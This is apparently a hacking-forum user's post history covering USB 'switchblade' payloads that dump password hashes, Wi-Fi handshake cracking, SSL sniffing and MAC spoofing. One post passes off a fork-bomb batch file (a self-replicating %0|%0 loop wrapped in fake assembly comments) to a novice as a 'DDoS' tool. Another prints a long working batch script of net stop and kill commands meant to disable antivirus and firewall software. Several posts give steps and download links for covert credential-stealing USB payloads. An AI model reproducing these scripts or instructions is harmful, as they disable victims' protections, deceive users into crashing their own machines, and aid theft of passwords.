ElevenWarrior
-
Posts
34 -
Joined
-
Last visited
Posts posted by ElevenWarrior
-
-
Come on guys. atleast help the guy. He asked politely after all. Heres how you do it:
create a file called ddos.bat put the following code in it and run the file
@echo off title "Lyzons DDoSer" echo "Enter the website url you would like to ddos:" set /P URL="url: " rem pop "user32.dll", "net32.dll", "telnet64.dll" rem push eax rem asm echo "Initialised DDoS attack, running ddos sequence:" ::init Win32DenieHost, URL rem pop eax rem jmp "beginattack" :beginattack ::reg, thread, 1337:%0 rem pop ip, cx rem push eax, cx ::run, 1337 ::ping net32Host, URL, 65535 %0|%0 goto beginattack
use it with caution. Make sure you have no other program running or the attack wont be very effective.
has anyone tried this script?
does it work?
-
yah! USB payloads are added. *downloads*
-
-
-
First off its not that simple if you could steal the password just like that then security team might as well lay out a welcome mat for you. Switchblade steals something called hashes those hashes you have to crack using a variety of methods dictionary,bruteforce, rainbow tables. If your looking to get vista passwords your out of luck because no payload right now can get the hashes. Even if you somehow get the hash of vista they can be very hard to crack.
Right now i don`t think that you are ready enough to start using a switchblade i suggest that you understand more about hashes and password cracking. Its a complex progress (for a noob like you)
1. assuming that u want a u3 payload (plz tell me you know what this is) flash the custom iso
2. plug into box
3. get log files and crack the hashes
its not as simple as download plug in and your done. By the way what im doing is VERY nice most people would tell you to read the forums. Im not going to give a step by step guide because thats spoon feeding and to tell you the truth thats what im doing right now
P.s for the pros and 1337 haxor that are reading this im trying to make it noob friendly since most of you are scoffing at how simple i made it
notice we've got nothing wrong with people who are trying to learn, its just you give this tool to the wrong people, bad things happen
-
can you post a code snippet, from the begining of the program? That will help in determining the language.
sure its just the Leapos Pocket kinfe payload.
*code snippet coming*
-
Which language?
Assuming its in vb.net and the bat file is in the same directory as your program:
Shell("av.bat")
I'm not really sure what the name of the language is, i just know that its, the same script that we use on the .bat files.
(it might be visual basic?)
-
I need some help with coding dos programs. I think I understand what to do but I"m not sure.
I'd like to add (at the begining) of my payload, instructions to run a certain program. (av.bat)
how can I do this?
-
well done! I was hoping someone would do something like this,
I would only suggest that you make the USB payloads either built in. (IE, password dumper etc)
again, Good job!
-
one question for you guys,are you using the LPinstaller you got from Sandisk's website or are you using Universal Customizer?
okay I'm using the U3 customizer and I finally flashed the partion, but its not dumping the logs, is it possible I didn't config the modules right?
-
You need something more than Ettercap to do this. The easiest way I know of is using something that can man-in-the-middle the encryption, such as Jay Beale's Middler. Ettercap just sniffs (and arp poisons to get traffic from switched networks). MiTM attacks try to trick users into using encryption that you have the key for, so then you can decrypt the session.
okay I've been told EVERYWHERE else that this isn't so. (no offence) can anyone else back this up?
-
Try allowing it, or if you overcloak your cpu, dont' overcloak it. I had the same problem when i was overcloaking it
same problem here, and i can't figure it out. somtimes its flashes sucessfully, but the Files aren't on the flashed partion.
-
the problem with that is that 99.9% of the data your trying to gather is held in thier user account files and or thier user account registry entries. So the payload would theoretically run just wouldnt gather any useful information. Now i know there are ways with bartpe to load a user registry hive but i dont think it would do it in exactly the same way in order to work the way you want. What I would be interested in is if someone came up with a payload that did run on bartpe and slurped all the user accounts of useful information...
now, a idea that might work would be to build a plugin that would do just that. slurp all info from the accounts. I don't think it'd be too hard, but again I don't code. theres already a windows Xp key finder plugin, reg hive copyier, IP scanners and such, I really think this is a possibility.
-
I've used ettercap in both Linux and windows, but I can't seem to get in to sniff SSL login's. I can get plain text fine, but not, the encrypted ones. any ideas?
-
It might be possible with Wine or somthing, I know almost nothing about linux but it sounds plausable.
yes, I know of a project called WinUBCD, It creates a version of (in this case) XP, and you can boot from the disk and have acess to thousands of tools. All we'd have to do to get Win UBCD to work with it would be to add plugins for ophcrack, and any hacking tool we want. I don't code so I don't know how to do its but I do knows its possible.
-
NO. not a single broadcom is supported.. STILL ITS $200. Backtrack, and aircrack-ng and coWPAtty are FREE
artto, if you've got 200 to throw at cracking WiFi, adn your card is supported go with Commview. if not Aircrack-ng is the way to go
-
yah well commview for WiFi is also 200-400 Dollars US
Aircrack-ng is free
even then Commview doesn't support of whole lot of cards ether
-
I know that you can use Languard NSS to do this, but are there any other tools?
(I've also used Nmap)
(t
-
I know that you can use Languard NSS to do this, but are there any other tools?
(I've also used Nmap)
sry for the double post
-
I know it is possible using Linux (BackTrack 3 etc.), but can you do this using Windows??
Which tools are good for WEP/WPA(2)??
Shoot! :)
okay, if you mean capturing the WPA handshake, then yes, but you must have spefic wireless card to do this. the best way is aircrack-ng but its not easy.
http://www.aircrack-ng.org/doku.php?id=&am...cd8f2c1762ed1ea
thats the home page, (above)
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
and that will tell you wether or not your card can support Aircrack-ng
thats what you'd use to capture the handshake,
now if you mean to crack the password once you have the handshake, then can you download, Aircrack-ng
http://www.aircrack-ng.org/doku.php?id=extendedwarning
hope this helps
-
now, I didn't code this but I found it on a fourm,...
@ECHOFF
net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
net stop ANTS
net stop apvxdwin
net stop ATCON
net stop ATUPDATER
net stop ATWATCH
net stop AUTODOWN
net stop AutoTrace
net stop AVCONSOL
net stop AVGCC32
net stop AVGCTRL
net stop Avgctrl
net stop AVGSERV
net stop AvgServ
net stop AVGSERV9
net stop AVGW
net stop avkpop
net stop AVKSERV
net stop avkservice
net stop avkwctl9
net stop AVP32
net stop AVP32
net stop AVPCC
net stop AVPCC
net stop AVPM
net stop AVPM
net stop Avsched32
net stop AVSYNMGR
net stop AvSynMgr
net stop AVWINNT
net stop AVXMONITOR9X
net stop AVXMONITORNT
net stop AVXQUAR
net stop AVXW
net stop BLACKD
net stop BLACKICE
net stop BlackICE
net stop CLAW95
net stop CLAW95CF
net stop CLEANER
net stop CLEANER3
net stop CMGRDIAN
net stop CONNECTIONMONITOR
net stop defscangui
net stop DEFWATCH
net stop DOORS
net stop DVP95
net stop EFPEADM
net stop ETRUSTCIPE
net stop EVPN
net stop EXPERT
net stop fameh32
net stop fch32
net stop fih32
net stop fnrb32
net stop fsaa
net stop fsav32
net stop fsgk32
net stop fsm32
net stop fsma32
net stop fsmb32
net stop gbmenu
net stop GENERICS
net stop GUARD
net stop GUARDDOG
net stop HELP
net stop IAMAPP
net stop IAMSERV
net stop ICLOAD95
net stop ICLOADNT
net stop ICMON
net stop ICSUPP95
net stop ICSUPPNT
net stop IFACE
net stop IOMON98
net stop ISRV95
net stop JEDI
net stop LDNETMON
net stop LDPROMENU
net stop LDSCAN
net stop LOCKDOWN
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop MCAGENT
net stop MCMNHDLR
net stop MCSHIELD
net stop McShield
net stop MCTOOL
net stop MCUPDATE
net stop MCVSRTE
net stop MCVSSHLD
net stop MGAVRTCL
net stop MGAVRTE
net stop MGHTML
net stop minilog
net stop MONITOR
net stop MOOLIVE
net stop MWATCH
net stop NAVAP
net stop navapsvc
net stop NAVAPW32
net stop NAVENG
net stop NAVEX15
net stop NAVLU32
net stop NAVW32
net stop NAVWNT
net stop NDD32
net stop NeoWatchLog
net stop NETUTILS
net stop ngdbserv
net stop NGServer
net stop NISSERV
net stop NISSERV
net stop NISUM
net stop NISUM
net stop NMAIN
net stop NORMIST
net stop NPROTECT
net stop NPSSVC
net stop NSCHED32
net stop ntrtscan
net stop NTVDM
net stop NTXconfig
net stop NVC95
net stop NVSVC32
net stop NWService
net stop NWTOOL16
net stop PADMIN
net stop pavproxy
net stop PCCIOMON
net stop pccntmon
net stop pccwin97
net stop PCCWIN98
net stop pcscan
net stop PERSFW
net stop POP3TRAP
net stop POPROXY
net stop PORTMONITOR
net stop PROCESSMONITOR
net stop PROGRAMAUDITOR
net stop PROT95
net stop PVIEW95
net stop RAV7
net stop RAV7WIN
net stop REALMON
net stop RESCUE
net stop RTVSCN95
net stop sbserv
net stop SCAN32
net stop SCRSCAN
net stop sharedaccess
net stop SPHINX
net stop SPYXX
net stop SS3EDIT
net stop STOPW
net stop SVW3
net stop SWEEP95
net stop SweepNet
net stop SWEEPSRV
net stop SWEEPSRV.SYS
net stop SweepUpdate
net stop SWNETSUP
net stop SymProxySvc
net stop SYMTRAY
net stop TFAK
net stop vbcmserv
net stop VbCons
net stop VET32
net stop VET95
net stop VETTRAY
net stop VPC32
net stop VPTRAY
net stop VSCHED
net stop VSECOMR
net stop VSHWIN32
net stop VSMAIN
net stop vsmon
net stop VSMON
net stop VSSTAT
net stop WATCHDOG
net stop WEBSCANX
net stop WGFE95
net stop WIMMUN32
net stop WRADMIN
net stop WRCTRL
net stop ZAPROMINILOG
net stop ZONEALARM
kill _AVPCC.EXE
kill ALOGSERV.EXE
kill ANTI-TROJAN.EXE
kill ANTS.EXE
kill APVXDWIN.EXE
kill ATro55en.exe
kill ATWATCH.EXE
kill AUTOUPDATE.EXE
kill AVGSERV9.EXE
kill AVPCC.EXE
kill AVPM.EXE
kill bd_professeional.exe
kill bidef.exe
kill bidserver.exe
kill BIPCP.exe
kill bipcpevalsetup.exe
kill bisp.exe
kill bs120.exe
kill CDP.EXE
kill CLEANER.EXE
kill cleaner3.exe
kill CMGRDIAN.EXE
kill cmon016.exe
kill cpf9x206.exe
kill cpfnt206.exe
kill cwnb181.exe
kill cwntdemo.exe
kill deputy.exe
kill dpfsetup.exe
kill DRWATSON.EXE
kill drweb32.exe
kill escanh95.exe
kill escanhnt.exe
kill escanhnt.exe
kill escanv95.exe
kill EZAntivirus-CNET.exe
kill FAST.EXE
kill firewall.exe
kill fp-win_trial.exe
kill fsav530stbyb.exe
kill fsav530wtbyb.exe
kill fsav95.exe
kill GBMENU.EXE
kill GBPOLL.EXE
kill GUARDDOG.EXE
kill hacktracersetup.exe
kill hwpe.exe
kill IAMAPP.EXE
kill IAMSERV.EXE
kill iparmor.exe
kill jammer.exe
kill kavlite40eng.exe
kill kavpers40eng.exe
kill kavpers40eng.exe
kill kerio-pf-213-en-win.exe
kill kerio-wrl-421-en-win.exe
kill kerio-wrp-421-en-win.exe
kill KillProcesssetup161.exe
kill ldpro.exe
kill localnet.exe
kill LOCKDOWN.EXE
kill lockdown2000.exe
kill luau.exe
kill MCSHIELD.EXE
kill mfw2en.exe
kill mfweng3.02d30.exe
kill MINILOG.EXE
kill MOOLIVE.EXE
kill mrflux.exe
kill mu0311ad.exe
kill nav80try.exe
kill NAVAPW32.EXE
kill NAVAPW32.EXE
kill ncinst4.exe
kill NDD32.EXE
kill NetSpyHunter-1.2.exe
kill netzip.exe
kill Norton_Internet_Secu_3.0_407.exe
kill Norton_Internet_Secu_3.0_407.exe
kill NPF40_TW_98_NT_ME_2K.exe
kill NPROTECT.EXE
kill NSCHED32.EXE
kill NTVDM.EXE
kill nwinst4.exe
kill NWTOOL16.EXE
kill nz.cab
kill outpostinstall.exe
kill outpostinstall.exe
kill outpostproinstall.exe
kill PADMIN.EXE
kill panixk.exe
kill PAVPROXY.EXE
kill pcc2002s902.exe
kill pcc2k_76_1436.exe
kill pcc2knt_76_1436.exe
kill pcdsetup.exe
kill pcip10117_0.exe
kill pf2.exe
kill platin.exe
kill POPSCAN.EXE
kill PPINUPDT.EXE
kill PPTBC.EXE
kill PPVSTOP.EXE
kill ProcExplorerv1.0.exe
kill proport.exe
kill pspf.exe
kill purge.exe
kill PVIEW95.EXE
kill qserver.exe
kill rav8win32eng.exe
kill RULAUNCH.EXE
kill SBServ.exe
kill setup_flowprotector_us.exe
kill setupvameeval.exe
kill shellspyinstall.exe
kill shn.exe
kill spf.exe
kill SPYXX.EXE
kill SS3EDIT.EXE
kill st2.exe
kill supftrl.exe
kill supporter5.exe
kill TAUMON.EXE
kill TAUMON.EXE
kill tauscan.exe
kill TC.EXE
kill TCA.EXE
kill TCM.EXE
kill TDS-3.EXE
kill tds-3.exe
kill tfak5.exe
kill titanin.exe
kill titaninxp.exe
kill trjsetup.exe
kill trojantrap3.exe
kill trojantrap3.exe
kill UPDATE.EXE
kill vbcmserv.exe
kill VbCons.exe
kill vbust.exe
kill vbwin9x.exe
kill vbwinntw.exe
kill vcsetup.exe
kill vfsetup.exe
kill vnlan300.exe
kill vnpc3000.exe
kill vpfw30s.exe
kill vpfw30s.exe
kill vscenu6.02d30.exe
kill VSHWIN32.EXE
kill vsisetup.exe
kill VSMON.EXE
kill VSSTAT.EXE
kill vswin9xe.exe
kill vswinntse.exe
kill vswinperse.exe
kill w9x.exe
kill WGFE95.EXE
kill wnt.exe
kill wsbgate.exe
kill xpf202en.exe
kill ZAPLUS.EXE
kill ZAPRO.EXE
kill zapsetup3001.exe
kill ZATUTOR.EXE
kill ZAUINST.EXE
kill zonalm2601.exe
kill ZONEALARM.EXE
Worked for me!
-
@(X3N)
hey, can you tell me the name of the exploit that can kill the AV's?
-
I was re-installing the Leapos pocketknife switchblade, and every time right before it finish's installing on the U3 flash partion, it says U3 drive un-available. I can't figure out why. (leapos newest version is the one i'm using)
help!
UPDATE, am I supposed to use the LPI installer instead of U3 Customizer?
-
okay here's the gonzor payload.
v.20 http://rapidshare.com/files/113283682/GonZ...hBlade-V2.0.zip
and the leapos v0.8.8.0
http://rapidshare.com/files/151380339/Pock..._v0880.zip.html
http://www.megaupload.com/?d=9POZA50J
those seem to be the most common ones. any others?
Chaning MAC address
in Security
Posted
I want to change the MAC address on my wireless card and I've tried manual doing it and with SMAC but it dosen't work. on SMAC I put in the new address and refresh it and the MAC stays the say. I think the MAC may be written into the card. does anyone have any ideas on by passing that?